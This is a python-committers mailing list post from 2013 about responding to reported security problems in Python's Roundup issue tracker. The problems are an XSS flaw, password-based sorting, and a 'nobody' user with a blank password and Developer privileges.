On Mon, 15 Jul 2013 11:09:08 +0300, Michael Foord <mich...@voidspace.org.uk> wrote: > > On 15 Jul 2013, at 11:05, "M.-A. Lemburg" <m...@python.org> wrote: > > > Who would be the one to contact for issues like these ? > > > > The case is rather urgent, since the XSS can be used for stealing > > session cookies on *.python.org. > > > > The sorting by password issue is a more obscure one. Just removing > > the "feature" to sort by password should be enough to solve it. > > Technically it's an infrastructure issue (cc'd), but fixing the code of > roundup is hardly their domain. > > Ezio Melotti (cc'd) did a lot of work on the Python installation of roundup, > so he may have a better idea. > > We have a security mailing list but that is mainly intended for security > issues in the language: > > secur...@python.org <secur...@python.org>
The OP also emailed security (which I heard about via IRC, I'm not on that list). Ezio is a Roundup developer, so he is indeed the best person to look at the XSS issue, since it is a Roundup problem and not specific to the Tracker. I can take a look too but he is more knowledgeable than I about roundup itself. There is another problem which is specific to our tracker and which is the bigger issue right at the moment. We have a 'nobody' user with a blank password and Developer privileges. I'm about to go out, so I don't want to make a change that might break something right this moment, but anyone with the Coordinator role could take this on if they want to do it right now: remove either the Developer role, or both roles, from that user and see what happens. I suspect that user should not exist at all, but I don't know for sure. --David _______________________________________________ python-committers mailing list python-committers@python.org http://mail.python.org/mailman/listinfo/python-committers